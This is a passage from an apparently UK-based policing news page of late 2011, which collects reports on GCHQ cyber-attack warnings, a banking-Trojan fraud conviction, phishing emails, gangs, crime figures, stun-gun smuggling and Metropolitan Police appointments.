He added: "Part of our role at HMIC is to provide the public with reliable information about the police. That is why we have produced this easy to use online tool.

"To ensure the public get a complete picture of policing, the Inspectorate continues to inspect forces and publish professional judgements in our reports."

Senior policing professionals have welcomed the new service as a step forward for transparency but emphasised that policing and its costs could differ markedly between areas.

CC Grahame Maxwell, of North Yorkshire Police, said: "We support this kind of transparent and publicly accountable insight into an organisation and its performance. The strive to improve and become even more efficient and effective must be encouraged, never more so in these times of austerity.

"Of course, no two forces are the same and the ways of working in a huge, largely rural policing area such as North Yorkshire can contrast markedly with a smaller, urban policing area. So to try and draw direct comparisons is not really possible."

Mark Burns-Williamson, Chairman of the Association of Police Authorities, said the Comparator put powerful information about law enforcement into public hands.

He added: "As those responsible for holding the police to account until November 2012, we will draw rigorously on the revelations within this site to help consolidate our legacy of a more efficient and more effective police service for the public."

(9th November 2011)


 

UK CYBER ATTACKS AT DISTURBING LEVELS, WARNS GCHQ CHIEF
(Guardian, dated 31st October 2011 author James Meikle)
www.guardian.co.uk  [Note 1]

A "significant but unsuccessful" cyber-attack was made on the Foreign Office and other government departments this summer, according to GCHQ.

Iain Lobban, director of the government's listening centre, said the UK's "continued economic wellbeing" was under threat because of a "disturbing" number of such attacks on the government, industry and members of the public.

Writing in the Times, he said sensitive data on government computers had been targeted, along with defence, technology and engineering firms' designs.

"I can attest to attempts to steal British ideas and designs - in the IT, technology, defence, engineering and energy sectors, as well as other industries - to gain commercial advantage or to profit from secret knowledge of contractual arrangements," said Mr Lobban.

"Such intellectual property theft doesn't just cost the companies concerned. It represents an attack on the UK's continued economic wellbeing.

"We are also aware of similar techniques being employed to try to acquire sensitive information from British government computer systems, including one significant (but unsuccessful) attempt on the Foreign Office and other government departments this summer."

Mr Lobban did not give further details, but added: "Criminals are using cyberspace to extort money and steal identities, as well as exploit the vulnerable. Increasingly sophisticated techniques target individuals.

"We are witnessing the development of a global criminal market place - a parallel black economy where cyber dollars are traded in exchange for UK citizens' credit card details. Tackling cyber crime matters and it is a very real threat to our prosperity."

Mr Lobban's article comes before a conference in London on Tuesday on cyber-security, including political leaders and technology experts. Among the delegates will be Hillary Clinton, the US secretary of state, and Jimmy Wales, co-founder of Wikipedia.

William Hague, the foreign secretary, told the Times there had been an "exponential rise" in incidents, with welfare and tax databases among systems "liable to attack".

"Countries that cannot maintain cybersecurity of their banking system, of the intellectual property of their companies, will be at a serious disadvantage in the world."

In one criminal operation, interrupted by British intelligence and crime agencies, 1m stolen identities were being traded. The discovery this summer, by GCHQ and the Serious Organised Crime Agency, prevented £300m of debit and credit card fraud, according to Hague.

Organised crime networks were in an "arms race" trying to steal money and ideas, in which "new techniques are adopted every day". The government was putting £650m into preventing attacks over the next four years, and was already combating problems each hour or each day, Mr Hague said.

"It is vital that businesses work with the government to become aware of all the threats they face and work with us on their defences."

Governments did not and should not control the internet, said Mr Hague, but he hoped for a "common sense of what the acceptable norm of behaviour in cyberspace" ought to be. The "vast" benefits of the rise of the internet must be balanced with the risk, he said.

In May, the Guardian revealed how the UK was developing a cyber weapons programme to counter growing threats to national security. Mr Hague told a security conference in Munich in February that the Foreign Office had repelled a cyber-attack a month earlier from "a hostile state intelligence agency". Sources told the Guardian at the time that the attack was believed to be from Chinese intelligence agencies.

(9th November 2011)


 

MEN JAILED FOLLOWING £3m E-CRIME INVESTIGATION
(Courtesy of: Metropolitan Police, dated 2nd November 2011)
www.met.police.uk

The ring leaders of a major organised criminal network which siphoned nearly £3 million from the bank accounts of unsuspecting members of the public were jailed this week following an investigation by the Met's Police Central E-Crime Unit (PCeU).

Ukrainian nationals Yuriy Konovalenko aka Pavel Klikov (3.7.82 - 29 ys), and Yevhen Kulibaba (18.3.78 - 33 ys), both of 9 Nevada Heights, Chingford Mount Road, Chingford, were each jailed for four years and eight months at Croydon Crown Court after previously pleading guilty to conspiracy to defraud.

This result is the culmination of a complex and protracted investigation by detectives from the Met's Police Central e-Crime Unit which has seen 13 people jailed for their part in a sophisticated international online fraud that attacked the heart of the UK banking industry.

The investigation, codenamed Operation Lath, focussed on the activities of a group responsible for conducting a systematic and highly sophisticated banking fraud which attacked the banking accounts of hundreds of online customers.

The fraud was perpetrated through the use of banking 'Trojans' to infect the personal computers of bank account holders and subsequently secure funds from them. The malicious software programme was able to capture confidential information, such as usernames, passwords and account numbers.

These details were then used to access those accounts without the knowledge of the owners. Funds were then transferred to a large number of receiving accounts controlled by the group.

Kulibaba was the principal within this group of conspirators. He was based in the Ukraine and was responsible for obtaining and allocating accounts to be attacked, and organising the UK based conspirators to set up and operate recipient accounts and remove funds from them.

Konovalenko was Kulibaba's right hand man in the UK. He had a co-ordinating role, organising the establishment and operation of recipient accounts and instructing those with responsibility for organising the removal of the money out of the recipient accounts.

During the investigation the PCeU worked closely with UK banks and colleagues from the Crown Prosecution Service, the FBI and the US Department of Justice.

On 29 September 2011, 20 individuals were arrested at addresses in London and the Home Counties. During house searches, computers, mobile telephones, false passports, banking documents and other exhibits were seized and later examined.

Further arrests were made and additional inquiries were conducted jointly with investigators from Her Majesty's Revenue and Customs (HMRC).

The total amount stolen through the operation of the fraud has not been definitively established; however the UK prosecution looked at the activities of the 13 defendants between September 2009 and March 2010 and during this period the proved loss was at least £2,884,590. The total amount which the conspirators attempted to remove was at least £4,286,559.

Det Insp Colin Wetherill, from the Metropolitan Police Central eCrime Unit said: "These defendants were part of an organised network of computer criminals operating a state-of-the-art international online banking fraud, through which they stole many millions of pounds from individuals and businesses in the UK and United States.

"The investigation involved unprecedented levels of cooperation between the Metropolitan Police, the UK banks, the FBI and other UK and international law enforcement agencies. We are working hard to reduce the harm caused by these activities, to put fear into the minds of those contemplating these conspiracies and to bring such offenders to justice."

There are several steps individuals and institutions can take in order to minimise the likelihood of their computers becoming infected with malware:

- Frequently check your operating system is up-to-date to ensure your software has the latest fixes for new viruses, worms, and Trojan horses. Security 'patches' are usually free and can be downloaded from the software vendors.

- Run anti-virus and anti-spyware software - always run these programs and keep them regularly updated.

- Make sure your anti-virus programme has the capability to scan e-mail and files as they are downloaded from the Internet.

- Run full disk scans periodically, which will help prevent malicious programmes from reaching your computer.

- Use a personal firewall - a full firewall can protect your computer from unauthorised access when configured correctly.

- Disconnect your computer from the Internet when you are not using it.

- Avoid opening attachments or following links in emails and on websites.

- Do thorough research before downloading any new, unknown software.

- Comprehensive advice can be found at www.getsafeonline.com

(9th November 2011)


 

CABIN CREW PIONEER NEW ANTI-TRAFFICKING INITIATIVE
(UK Home Office, dated 18th October 2011)
www.homeoffice.gov.uk

Immigration Minister Damian Green has hailed a new initiative to help cabin crew spot signs of human trafficking.

Virgin Atlantic is providing its cabin crew with special training to identify those who may be engaged in trafficking, their potential victims and how to report them to authorities before they arrive in the UK.

It is the first time an airline has worked with the UK Border Agency on training for cabin crew - a goal set out in the government's Human Trafficking Strategy published in July.

Human Trafficking Strategy

Immigration Minister Damian Green said: 'We have already made significant progress on the commitments we made in our Human Trafficking Strategy to do more to tackle this issue and this initiative provides us with another powerful tool to help combat it.

'I am delighted that Virgin Atlantic is leading the way in providing this training for staff and I would strongly encourage other airlines to step up and join the fight.'

E-learning and 24-hour helpline

The Virgin pilot project includes an e-learning package that raises awareness among staff about the issues surrounding human trafficking and details the indicators to look out for during a flight.

Cabin crew, who are in a prime position to identify both victims and traffickers, will have access to a 24-hour helpline to report concerns to the UK Border Agency. This will ensure that officers can meet the flight and question the individual concerned, allowing law enforcement agencies to take action against traffickers and provide support to the victims of trafficking.

UK Human Trafficking Strategy :

www.homeoffice.gov.uk/crime/human-trafficking-strategy/

(9th November 2011)


 

NEW GANGS TASK FORCE FORMED
(West Midlands Police, dated 20th October 2011)
www.west-midlands.police.uk

West Midlands Police is establishing a new task force in its continued bid to tackle urban street gangs across the whole force.

The dedicated team of 25 officers will be set up to tackle the 42 urban street gangs that exist in the West Midlands area, with over 400 people affiliated to these gangs. Traditionally, the force has concentrated on only a relatively small number of geographic areas including central Birmingham, Wolverhampton, Sandwell and Coventry. The task force will pull together all these areas and any others where gangs are identified.

Since 2003, the force has focussed on a multi-agency partnership approach to address the gang issue by beginning to divert young people away from gang culture through early intervention and schools-based initiatives. Main strands of work have also concentrated on enforcement, managing offenders linked to gang-related criminality and using mediation as a tactic in defusing tensions amongst opposing gangs.

As a result of this work, projects have been carried out such as Young Men at Risk which has provided support for vulnerable men aged 16 to 26 who have decided to exit the gun and gang culture and the 'My Life My Choice' DVD which is used as an educational resource to help teachers address the difficult issues of gangs.

The force has seen some success over recent years - the number of firearm-related offences dropped from over 1,200 per year from 2004 to 2007 to 900 offences per year over the last three years.

A number of operations have been conducted over the last few years resulting in large seizures of class A drugs, cash and firearms as well as numerous successful convictions against dangerous offenders.

Acting Det Supt Jo Chilton, Head of the Gangs and Organised Crime Unit in Force CID, said: "West Midlands Police is committed to tackling gang-related criminality as well as reducing the number of young people becoming involved in gang culture and carrying weapons.

"We continue to see the issue of tackling gangs as intrinsic to policing many of our areas which is why we are re-investing resources into this area so we can better support front line officers.

"We will continue to raise awareness about the risks involved of carrying a knife or firearm as many youngsters are not aware of the consequences of carrying a weapon.

"Any involvement in gun crime can bring a minimum five year custodial sentence, even if the person is not using the gun. This should be a powerful deterrent for anyone thinking of walking out with a weapon - it can have devastating consequences not only for the victim, their family and the offender's family.

"We want to be able to divert youngsters away from getting involved with gang activity by giving them something positive to concentrate on and to give people involved in gangs the opportunity to break away and make a fresh start."

Click the link to read the Tackling Gangs Booklet :

www.west-midlands.police.uk/latest-news/docs/Tackling-Gangs-Booklet.pdf

(9th November 2011)


 

UK CRIME FIGURES FALL HAS HALTED
(Guardian, dated 20th October 2011 author Alan Travis)
www.guardian.co.uk  [Note 1]

The remarkable 16-year fall in overall crime in England and Wales appears to have been halted by the impact of cuts and rising unemployment, with an apparent 10 per cent rise in household burglary.

Overall crime levels appear to have remained flat or started to nudge up with the latest British Crime Survey (BCS) showing a 2 per cent rise and police recorded crime figures a 4 per cent fall over the 12 months to this June.

The quarterly crime figures, which cover the 12 months to the second quarter between April and June this year, do not include this summer's riots. But they also show a 13 per cent rise in "other household theft", which covers thefts from gardens and sheds, the apparent 10 per cent rise in burglary according to the BCS and a 3 per cent rise in robbery and a 2 per cent rise in the most serious sexual offences on police figures.

The police figures, however, show continuing falls in most other categories of crime including a 12 per cent drop in criminal damage, 8 per cent falls in both violence against the person and car crime, and a 3 per cent fall in domestic burglary. All categories of BCS crime rose except for vandalism, which dropped by 9 per cent.

Home Office statisticians were very cautious about the figures, saying that taken together the two measures - BCS and police figures - show crime to have been stable in the 12 months to June with no statistically significant change in the crime rate.

The Home Office said the apparently alarming 10 per cent rise in burglary on the BCS was not statistically significant and comes alongside a 3 per cent fall in police recorded burglaries. "The latest figures suggest it is still too early to be confident there has been a real change in the medium-term trend for BCS burglary, which has been relatively stable since 2004/05," says the crime figures bulletin.

However, the statisticians say there is evidence of increases in lower-level offences such as pickpocketing, shoplifting and theft of unattended property. Police recorded "other theft" rose by 5 per cent and BCS "other household thefts" are up 13 per cent.

The 2 per cent rise in serious sexual offences follows increases in reporting and recording such crime since 2009, but this rate of increase seems to be slowing.

Provisional statistics show that gun crime fell by 16 per cent on the police figures.

Public confidence in the ability of the police and local council to deal with antisocial behaviour in their area rose from 52 per cent to 54 per cent.

Jon Murphy, the Association of Chief Police Officers lead on crime, said the alarming increase in robberies at knifepoint was partly driven by demand for mobile phones to be sold abroad at double their value.

"While there were falls in most police recorded crime and particularly in violence against the person, the increase in robbery and robbery with knives is a cause for concern.

"We believe this is in part driven by demand for mobile phone handsets, which can fetch more than double their worth on the black market abroad," he said.

"Worryingly, a large proportion of phone owners still do not have passcodes on their phones, leaving them vulnerable to possible ID theft and fraud. Phone owners are encouraged to set passcodes and look into anti-crime phone functions such as remote wipe technology.

"Police forces will want to focus actions to combat these offences and offer crime prevention advice."

(9th November 2011)


 

POLICE SMASH VEHICLE RINGING GANG
(Police Oracle, dated 18th October 2011 author Cliff Caswell)
www.policeoracle.com  [Note 1]

Metropolitan Police detectives have spoken of their satisfaction after two operations secured the convictions of six men responsible for stealing and selling luxury vehicles.

Officers from the Stolen Vehicle Unit moved to tackle the theft, ringing and resale of the high value cars following burglaries throughout London and south-east England.

And their efforts in Operations Elmendorf and Loden paid off - with the six defendants jailed for 17 years and some 70 cars recovered before they could be sold on.

Southwark Crown Court was told that the identities of stolen vehicles were altered before - in some instances - being sold on to unsuspecting customers.

Officers seized fraudulently obtained logbooks and registration forms for use in car ringing plus cash and documents relating to the advertisement of stolen cars.

A/DCI Paul Fuller, from the Stolen Vehicle Unit said the success of both operations had been down to "meticulous and painstaking work" of detectives and police staff.

He added: "The defendants caused considerable distress - not only those whose homes were invaded while they slept upstairs but also the individuals who innocently purchased a stolen, rung vehicle only to later have it seized by the police and find themselves out of pocket by thousands of pounds.

"The unit will continue to relentlessly identify and target organised criminal networks that steal and seek to dispose of stolen vehicles, and will use all means to secure the evidence to convict them and dismantle their criminal lifestyles."

IMPORTANT NOTE : Even when at home, ensure that your car keys are kept out of sight of unwanted visitors!

(9th November 2011)



CROSS-BORDER CRIME EFFORTS TIGHTENED
(Kent Police, dated 12th October)
www.kent.police.uk

 

The Chief Constable of Kent travelled to France last week to sign a new co-operation agreement with the most senior French Government official for the Northern French region of Pas-de-Calais, Monsieur Pierre de Bousquet.

The meeting was to extend an existing joint initiative between the two forces who work together to deal with cross border criminality and ensure the Channel is not used to evade justice or spirit away the ill-gotten gains of a criminal lifestyle.

The Chief Constable, Ian Learmonth, said: "Kent is the Gateway to Europe. We have around 30 million people pass through the County each year, with that number increasing substantially during 2012 thanks to the Olympic and Paralympic Games".

"Anyone thinking of coming to Kent to commit crime, or trying to export stolen goods to Europe or contraband into the UK needs to think again. We share a close working relationship - and more information than ever - with our French counterparts to deal with criminals.

"We are constantly tightening our efforts to further reduce cross border criminality with France, as well as Belgium and the Netherlands."

Trans-frontier crime is pursued vigorously by Kent Police, working in partnership with police forces from other countries and UK partners, such as the UK Borders Agency (UKBA).

Specifically targeted is counter-terrorism, drug supply, people trafficking and illegal immigration. Kent Police seizes more of the proceeds of crime than any other UK police force, bar London's Metropolitan.

Due to the close working with the French Gendarmerie and UKBA, Kent Police confiscated, under the Proceeds of Crime Act, the sum of 22,700 euros on 8 March 2011 from Jonathan Lui.

The money was found in Lui's vehicle, a BMW car, when he was at the Channel Tunnel, Folkestone, travelling to France. Lui provided a UK address in High Wycombe and a rental address in France.

Folkestone Magistrates' Court found that the cash was not lawfully owned by Lui and that it was intended for unlawful conduct. The forfeiture was not contested and the cash seized therefore was forfeited.

Another example is the forfeiture of seized cash under the Proceeds of Crime Act from a couple at Dover Eastern Docks. A couple, originally from Somalia, were subject to an outstanding European arrest warrant in relation to the abduction and/or kidnap of a young boy from the Dutch Local Authorities. This child had been with foster carers in Holland.

Officers from Kent Police intercepted the vehicle with the three inside on 19 May 2010. A search of the vehicle and belongings identified a cash sum of over 10,000 euros, which was seized under POCA. The couple were handed to the Dutch Authorities to be subject of court proceedings. The boy was returned to his Dutch foster parents. The money was made subject of a forfeiture order under POCA by Folkestone Magistrates Court.

The joint initiative with the Gendarmerie Nationale from Pas-de-Calais has also seen regular operational visits which means Kent officers patrol alongside French officers on both sides of the channel and work together on tackling drugs, counter-terrorism and immigration crime.

(9th November 2011)


 

JOINING FORCES TO FIGHT FRAUD
(City of London Police, dated 13th October 2011)
www.cityoflondon.police.uk

A new strategy that aims to reduce fraud - a crime that affects everyone and is estimated to cost the UK £38 billion every year.

It is the first time that the government, industry representatives, voluntary groups and law enforcement agencies have joined together on such a large scale to sign a joint commitment to tackle fraud.

All thirty-seven partners that have signed up to Fighting Fraud Together will contribute to and be accountable for its success. They are intent on expanding and extending the successful activities that exist in their sectors and sharing fraud intelligence across boundaries to prevent and disrupt the activities of fraudsters.

Fighting Fraud Together and its accompanying action plan place strong emphasis on preventing fraud through greater fraud awareness and self protection, combined with stronger government and industry prevention systems and controls. It also sets out a more effective approach to enforcement.

Examples of the new initiatives that are being progressed under Fighting Fraud Together include:

Preventing fraud

Industry and the public sector will develop their intelligence-sharing capabilities to prevent fraud attacks.

Increasing awareness and reporting

A new research tool will help all sectors provide more targeted prevention advice to the public, particularly vulnerable people, and develop a better understanding of small businesses' vulnerability to fraud and the support they need. Action Fraud will expand its fraud report taking capacity to include all financially motivated online crime.

A more effective enforcement response

Greater intelligence capabilities of the National Fraud Intelligence Bureau will disrupt fraudsters' activities and rapidly close down the channels through which they operate and launder money. Increasing the use of the civil system will bring more fraudsters to justice and there will be more redress for their victims.

Fighting Fraud Together is an active commitment that will continue to evolve. The aim of all who have signed up is to encourage many more industries and organisations to sign up and become involved in the coming year.

Speaking at the Fighting Fraud Together launch event, today at Mansion House, James Brokenshire MP, Minister for Crime and Security said:

"I applaud the different organisations and industry groups that have joined together today to play their own part in Fighting Fraud Together. By sharing what we know, we will reduce fraud.

"Fraud causes serious harm to the public, to businesses and the wider economy. For too long fraud has almost been seen as a victimless crime. It isn't and too often the victims are some of the most vulnerable members of our community. That's why this new strategy is important to better target, prosecute and prevent it.

"The creation of a new Economic Crime Command as part of the National Crime Agency will also provide a more effective, better co-ordinated and intelligence-led response across all economic crime fighting agencies."

The National Fraud Authority led the development of Fighting Fraud Together on behalf of the whole counter fraud community, with significant input from the private and not-for-profit sector as well as law enforcement and government.

National Fraud Authority Chief Executive, Stephen Harrison, commented: "Fraudsters can be beaten. We have seen reductions in fraud in some sectors in recent years but overall the threat is still growing. Fighting Fraud Together provides the means for all sectors of the economy to learn from each other and collaborate.

"As a result of Fighting Fraud Together I expect to see more sharing of intelligence, more fraud losses prevented, a greater number of criminal enterprises disrupted, more assets denied and more criminals brought to justice. We have the tools to fight back. Now we have the will and commitment to use them together to even greater effect."

Adrian Leppard, Commissioner of the City of London Police, which is the UK's lead force for fraud, said: "The nature and scale of fraud offending across the UK demands a co-ordinated and collaborative response from law enforcement and the public, private and voluntary sector.

"Through Fighting Fraud Together we have a comprehensive strategy in place that will enable the counter fraud community to combat more effectively a crime that has permeated all corners of society.

"As the national lead force for fraud and the home of the National Fraud Intelligence Bureau, the City of London Police specialises in sharing intelligence and best practice and will utilise all its resources in support of the Fighting Fraud Together strategy, which we believe marks an important milestone in our collective efforts to combat fraud."

For more information please contact: The National Fraud Authority on 0203 356 1035

(9th November 2011)


 

STUN GUNS : CRIMINALS' NEW WEAPON OF CHOICE
(Sky News, dated 13th October 2011 author Mark White)
http://news.sky.com  [Note 1]

Criminals are increasingly choosing illegally-acquired stun guns as their weapon of choice, a Sky News investigation has revealed.

The devices are sold openly on market stalls in the Far East - and some appear to be smuggled into the UK.

Assistant Chief Constable Sue Fish, of the Association of Chief Police Officers (ACPO), said there was anecdotal evidence that some criminals may be turning to stun guns in the belief they might escape a jail term if caught.

She said: "I think our concern is that we could see an increase around the use of stun guns, because there does seem to be a misguided perception that they are seen as less serious than conventional firearms, when in fact the law views them exactly the same as an illegal gun."

ACPO is to embark on a detailed study of stun gun use by criminals, but at present there are no national statistics on the numbers of such weapons seized by the authorities.

England's four biggest police forces, who do record stun gun seizures, have recovered around 900 of them since 2008.

Last year, the number of crimes which involved the use of a stun gun in England and Wales stood at 128, an increase of 33% but still only a tiny proportion of overall firearms offences.

However, many crimes involving stun guns may go unreported. There is evidence drug dealers are using the weapons as an enforcement tool and many of their victims - habitual drug users - are reluctant to report their attackers.

Although touted as a weapon of self defence, they are terrifying and potentially deadly in the hands of criminals.

Staff at the West Midlands Air Ambulance charity near Birmingham have faced that horror.

They were recently robbed by masked men carrying stun guns who broke into their head office. They were tied up, held hostage and threatened for almost an hour before the raiders escaped with £12,000.

One of the charity's managers Jason Levy said: "There were around five or 10 people that were here for a meeting that day and they rounded a number of people up and we were pretty much held hostage here.

"We were put to the floor and at that point we realised there was a Taser gun. We were all pretty calm but pretty concerned about what was happening and what would happen next."

No-one has yet been arrested in connection with that robbery.

The vast majority of illegally-held stun guns in the UK have been bought overseas.

Asst Ch Con Fish said: "The main source for stun guns is from websites and illegally importing them into this country is a significant criminal offence for the importation as well as the subsequent possession.

"There are two clear criminal offences there. The other way that we are also seeing some weapons being brought in is by people literally bringing them in when they've travelled abroad and purchased them and then, either coming in by air, or by vehicle across our borders."

On a market stall in central Bangkok, they were only too happy to demonstrate for Sky News an array of dangerous weapons, including numerous stun guns.

We were able to buy one for around £15. It was disguised to look like a mobile phone, but the ring tone on this phone came with a 50,000 volt electric shock.

The weapon was disposed of a short time later. However, many are being smuggled into the UK, it seems.

The most recent figures from HM Revenue and Customs estimated around 1,000 such weapons a year are recovered at UK ports and airports.

Keith Vaz, chairman of the Commons' Home Affairs Select Committee, said: "One of the things we've got now is a border police force and therefore it is vital that there is proper monitoring and surveillance of what comes into the country.

"When it concerns a weapon of this kind, that has the potential to kill as well as to stun, it is important that we find out exactly how it's getting in... who's able to order this over the internet... and how we can stop it happening."

Devon and Cornwall police seized 60 mobile phone-type stun guns in two separate operations recently. Detectives believe the weapons originated in the Far East.

They were the exact same type as those we were able to buy legally

(9th November 2011)


 

MET HIRES 180 FORENSIC SCIENTISTS
(Guardian, dated 10th October 2011)
www.guardian.com  [Note 1]

Note : This article may be the copyright of a publication other than the Guardian newspaper.
Scotland Yard is hiring 180 scientists from the soon to be defunct Forensic Science Service to bring its scenes of crime work inhouse - raising fears amongst criminal law experts that the independence and integrity of expert prosecution evidence could be jeopardised.

As a result of the government's closure of the FSS, talks have been underway between the Metropolitan Police, the Home Office and the scientists' union, Prospect, to move the scientists to the Met's own forensic laboratory which is being expanded to take on part of the work originally done by the FSS.

The minister for crime and security, James Brokenshire, has signed off on the move but the scientists' union is seeking assurances from Scotland Yard that the independence of its members will be protected.

"The Met will be using these scientists in a recovery and interpretive role in the field, at scenes of crime," said Steve Thomas, national officer for Prospect. "They know that there are concerns from the scientists around conflict of interests and it will be a cultural difference for the scientists. We are seeking assurances about the management and independence of the scientific work they are doing."

The move will see the pendulum swing back 30 years to the time when the Metropolitan Police forensic laboratory provided the expert evidence for detectives. But the Met lab was merged in 1996 with the new Forensic Science Service to create a national forensic facility independent of the police - partly because of concerns over the independence of scientists working within the police.

Criminal lawyer Simon McKay said he felt a "considerable sense of unease" at the news. "The whole evolution of expert evidence over the last decade has been to continue to strive for experts to be able to demonstrate their independence and integrity in criminal jurisdictions. And this is completely regressive," he said.

"It was always going to be the natural consequence of closing down the FSS. Essentially these scientists are going to be working for the police."

McKay cited historic miscarriages of justice such as the Birmingham Six, the Guildford Four and the prosecution of Colin Stagg for the murder of Rachel Nickell, as examples of the dangers of scientific experts working too closely with the police. The MP Chris Mullin said in the Commons in the aftermath of the Birmingham Six case that Dr Frank Skuse, the forensic scientist whose evidence helped convict the Birmingham Six, "conspired with police officers to pervert the course of justice."

The Met's director of forensic services, Gary Pugh, told the science and technology committee earlier this year that the force needed to ensure continuity of provision, and as such would be expanding its own forensic capability in preparation for the closure of the FSS in March.

"To remove the FSS as a provider of forensic science services in twelve months will be an operational challenge of unprecedented magnitude," he said. "(It) leaves the need for capacity to undertake forensic examinations in around 300 suspicious death investigations, 1,500 rape and sexually motivated crime cases and 1,500 crimes of serious violence while also picking up a large legacy of cases.

"The MPS is developing a new operating model where the recovery, interpretation and reporting of forensic evidence will be undertaken by the MPS and the DNA profiling and analytical science will be undertaken by commercial providers."

(9th November 2011)


 

OUTSTANDING RESULTS FOR FINGER TECHNOLOGY
(Police Oracle, dated 5th October 2011 author Cliff Caswell)
www.policeoracle.com  [Note 1]

A state-of-the-art device that can digitally match up fingerprints in minutes has been making its mark with officers at the sharp end of policing.

The MobileID kit - which is run from a BlackBerry smartphone - has now seen some extensive use since it was first deployed earlier in the year.

And with the means to check a suspect's prints against the thousands on the National Fingerprint Database anywhere in the country, officers are reporting excellent results.

Sgt Simon Goss, of the Roads Policing Unit Proactive Team at Hampshire Constabulary said MobileID was an outstanding and highly versatile tool.

Sgt Goss told PoliceOracle.com: "We are getting some fantastic results with it - results that we would not have secured by using any other policing methods.

"We have now had this equipment for some time in Hampshire Constabulary and it has really proved its worth - you can rapidly establish identification."

Sgt Goss was speaking after the fingerprinting device - which was launched by the NPIA over the summer - played an instrumental role in allowing officers from Hampshire to identify an unconscious man in intensive care.

A hospital had contacted the Force after admitting the seriously ill patient, and an officer swiftly provided confirmation of who they were treating.

Identification of unconscious or fatal victims at a crime, accident scene or hospital has proved one of the key benefits that the MobileID service is delivering.

An average saving of at least 30 minutes per case is among the other advantages.

The devices have now been deployed to more than half of forces in England and Wales this year, helping to cut the number of trips officers make back to the police station and giving them more time to spend out and about.

Nick Deyes, NPIA head of the Information Systems Improvement Strategy (ISIS) said: "This is a great example of how MobileID is not only an effective tool in the fight against crime, but also a piece of technology that can be used to help identify victims who have been seriously injured.

"This is a very promising start for a new service that is proving to be an asset."

DCC Peter Goodman, who is the ACPO spokesperson for the equipment, added: "The functionality that MobileID offers benefits to more than just the Police Service.

"As this example shows, the technology can also assist other agencies and the public. Over the coming months I expect to see more and more examples which highlight the advantages of using MobileID," he emphasised.

(9th November 2011)




MORE NEWS FROM MY SPAM INBOX- OCTOBER !
Category : phishing
 
My Internet Service Provider's (ISP) spam filter appears to have again done a very good job this month. For the second month running I have only received one suspect "banking" e-mail. But there were two miscellaneous phishing e-mails.

 

- From "Natwest Personal Banking"; subject "Restore your Access Online". The text of this phishing e-mail states "Our records shows that your online banking session has been blocked due to the following reasons". You are then requested to click on a bogus link and provide all of your banking details.

- From IRS (USA inland revenue). The e-mail stated that I was due a tax refund; all I need do is provide all my banking details and tax reference numbers after clicking on a link.

- From UPS ( within the USA ). A parcel is awaiting delivery, but has incurred a customs charge. Click on link and provide credit or debit card details to pay for customs then parcel will be released.

These e-mails are bogus and are just phishing for personal information. If you receive anything like them, delete immediately and do not open any attachments. If you are suspicious about activity on your bank account, contact your bank direct using a known telephone number, NOT contact details within the bogus e-mails.

(28th October 2011)



TWO METROPOLITAN POLICE ASSISTANT COMMISSIONERS APPOINTED
(BBC News, dated 25th October 2011)
www.bbc.co.uk

 

The Metropolitan Police Authority (MPA) has appointed two new assistant commissioners at Scotland Yard.

Surrey Chief Constable Mark Rowley and Simon Byrne, Deputy Chief Constable at Greater Manchester Police, will take on the role for five years.

Met Police Commissioner Bernard Hogan-Howe said they would bring huge levels of operational experience.

They join Britain's largest police force which has more than 50,000 staff, including 32,000 officers.

They will be paid an annual starting salary of £181,455.

Mr Hogan-Howe said: "I am really pleased to be able to welcome them to the Met and know that their appointment will help the Met deliver our aim of world-class policing that Londoners can be proud of."

Kit Malthouse, chair of the MPA, said: "Both Mark and Simon excelled in interview and impressed the panel with their knowledge and experience.

"As assistant commissioners they will be expected to play a significant role within the Met, ensuring its officers make London a safer city for us all."

Interviews were conducted by a panel of MPA members, with the commissioner, Her Majesty's Inspector of Constabulary Sir Denis O'Connor and Catherine Crawford, MPA chief executive, acting as advisers to the panel.

Editor's Note

Of the 32,000 Officers quoted in this article, only 19,000 are exclusively London operational officers. The remaining 12 - 13,000 officers work on other duties ( counter terrorism etc).

(26th October 2011)


 

A POLICE VISION

Based on extracts from the "History of the Metropolitan Police".

http://www.met.police.uk/history/crime_museum.htm

When people mention the history of the Police they always recall the name Robert Peel. He was the Home Secretary when the first Metropolitan Police Act was passed in 1829. Hence the polite police nicknames "Bobbies" and "Peelers". The people who were responsible for actually organising and designing the "New Police" had a lesser notoriety and they were Colonel Charles Rowan and Richard Mayne. It appears that Richard Mayne was given the responsibility of coming up with the Metropolitan Police's first vision statement. I wonder if he was paid the thousands of pounds that Public Relations and Marketing companies have charged the Met since for products that have been less meaningful and succinct?

In 1829 Sir Richard Mayne wrote:

"The primary object of an efficient police is the prevention of crime: the next that of detection and punishment of offenders if crime is committed. To these ends all the efforts of police must be directed. The protection of life and property, the preservation of public tranquillity, and the absence of crime, will alone prove whether those efforts have been successful and whether the objects for which the police were appointed have been attained."

Under the new regime I wonder what new Vision and Mission statements will look like; let alone its cost ?

(26th October 2011)


 

COMMISSIONER'S LETTER TO LONDONERS
(13th October 2011)

This letter was distributed via the neighbourhoodlink service.

If you would like to register for this service please go to : www.neighbourhoodlink.met.police.uk

This is a free messaging service (via e-mail) that enables you to regularly receive information from the Metropolitan Police Service. The information will be in relation to crime and safety in the areas you work and live.




New Scotland Yard
8 - 10 Broadway
London
SW1H 0BG
www.met.police.uk
Follow us on Twitter: @metpoliceuk

 

Dated : October 2011

Dear Londoners,

As the new Metropolitan Police Commissioner I felt it was important that I outlined to you what my priorities are and how we can work together to ensure that we make the Met the best police service in the world.

It is my intention to build on public trust in the Met and lead a service that criminals will fear, and you will be proud of.

As Commissioner, I have three simple aims: I want us to cut crime, cut costs, and continue to develop the culture of the organisation, and to do all that based on the simple but important values of humility, transparency and integrity.

I want us to do what I call Total Policing - that will mean preventing crime wherever we can, doing everything possible to target offenders when crime does happen, and ensuring that we properly look after victims.

You can help us make London safer. If you tell us information about people carrying weapons, acting suspiciously or who may have been involved in a crime, we will follow up on it. You can also use Crimestoppers on 0800 555111.

I want you to be able to hold me to account so in the first 100 days as Commissioner I want to:
1) Roll out more widely our programme to tackle gangs into 14 boroughs.
2) Lead a drive to seize uninsured vehicles, as we know that it is often criminals who fail to insure their cars.
3) Introduce a scheme whereby every month the whole of the Met will focus on tackling one particular issue across all of London, such as people who jump bail or who are committing traffic offences. By working together in this way we will be much more effective.

I want you to be able to tell me what is working and what you want us to do better. I will be coming out to every area of London in the months ahead and would encourage you to come and talk to me so that we can keep improving our service to you. I'm very proud to be your Commissioner and I am very proud of the men and women in the Met. We are your police force and will be working every minute to keep you safe.

Yours sincerely

Bernard Hogan-Howe

Commissioner

(24th October 2011)


UNINSURED DRIVERS IN LONDON TARGETED BY MET CAMPAIGN
